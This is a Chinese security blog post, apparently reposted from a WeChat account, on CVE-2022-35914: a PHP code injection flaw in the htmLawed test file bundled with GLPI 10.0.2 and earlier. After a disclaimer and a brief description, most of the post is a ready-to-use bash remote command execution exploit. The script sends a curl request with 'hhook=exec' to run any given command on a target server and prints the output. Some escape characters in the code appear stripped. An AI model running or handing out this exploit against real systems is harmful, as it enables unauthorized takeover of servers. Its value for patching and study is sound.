免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。GLPI10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed模块中的/vendor/htmlawed/htmlawed/htmLawedTest.php允许PHP代码注入。
poc&exp
# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# CVE: CVE-2022-35914
banner(){
echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _"
echo " / ___ / / ____| |___ / _ ___ |___ |___ / ___|/ _ / | || |"
echo "| | / /| _| _____ __) | | | |__) | __) |____ |_ ___ (_) | | || |_"
echo "| |___ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) __, | |__ _|"
echo " ____| _/ |_____| |_____|___/_____|_____| |____/____/ /_/|_| |_|"
}
while getopts ":u:c:" arg; do
case $arg in
u) URL=$OPTARG; let parameter_counter+=1 ;;
c) CMD=$OPTARG; let parameter_counter+=1 ;;
esac
done
if [ -z "$URL" ] || [ -z "$CMD" ]; then
banner
echo -e "n[i] Usage: ${0} -u <URL> -c <CMD>n"
exit
else
banner
echo -e "n[+] Command output:"
fi
curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '&nbps; [[0-9]+] =>'| sed -E 's/&nbps; [[0-9]+] => (.*)<br />/1/'
原文始发于微信公众号(漏洞猎人):CVE-2022-35914 | 远程命令执行
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论